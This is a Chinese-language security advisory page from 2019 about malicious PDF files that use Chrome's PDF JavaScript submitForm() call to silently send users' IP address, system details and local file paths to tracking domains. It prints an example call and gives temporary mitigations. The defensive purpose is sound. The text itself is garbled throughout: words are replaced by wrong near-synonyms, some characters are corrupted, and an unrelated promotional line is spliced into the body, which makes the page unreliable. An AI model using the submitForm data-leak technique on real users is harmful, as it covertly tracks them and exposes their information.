首页 > 安全钻研 > 安全传递 > 安全公告

恶意PDF文件利用Chrome浏览器0day缝隙安全公告

颁布功夫 2019-03-01

缝隙编号和级别

CVE编号：暂无，危险级别：高危， CVSS分值：官方未评定

影响领域

受影响版本：

Google Chrome浏览器所有版本

缝隙概述

近期，来自国表的安全钻研人员在野表检测到多个PDF恶意样本。这些样本利用了Chrome浏览器的0day缝隙，以实现追踪用户并偷偷某些网络用户信息的主张。

目前发现了两组利用Chrome零日缝隙的恶意PDF文件，其中一组文件在2017年10月传布，另一组文件在2018年9月传布。第一批恶意PDF文件将用户数据发送回“readnotify.com”，第二批发送回“zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。

缝隙的本原在于this.submitForm()这个PDF Javascript API。像this.submitForm('http://google.com/test')这样一个单一的挪用就会导致Chrome把幼我信息发送到google.com�？赡鼙恍孤兜男畔⒃毯�

1.用户的公共IP地址。

2.操作系统，Chrome版本等(在HTTP POST header中)。

3.用户推算机上PDF文件的齐全蹊径(在HTTP POST payload中)。

当用户使用Chrome浏览器打开这些恶意样本时，样本会运行恶意代码，在未经用户核准的情况下，以HTTP POST数据包的大局将一些用户信息静默发送到指定域“readnotify.com ”。

GA黄金甲·(中国区)官方网站

除去信息泄露以表，该缝隙暂未发显熹它利用方式，但毫无疑难，这些泄露的用户信息能够援手攻击者进行更多活动。

建复建议

目前该0day缝隙尚未有官方补丁，但Chrome团队或许将于4月底建复该缝隙。

一时缓解措施：

在补丁颁布之前，建议用户使用PDF阅读器利用法式在本地查看PDF文档，直到Chrome建复缝隙�；蛟贑hrome中打开PDF文档时断开推算机与Internet的衔接。

参考链接

https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子云子可信

司法申明

软件升级

投资者关系

安全钻研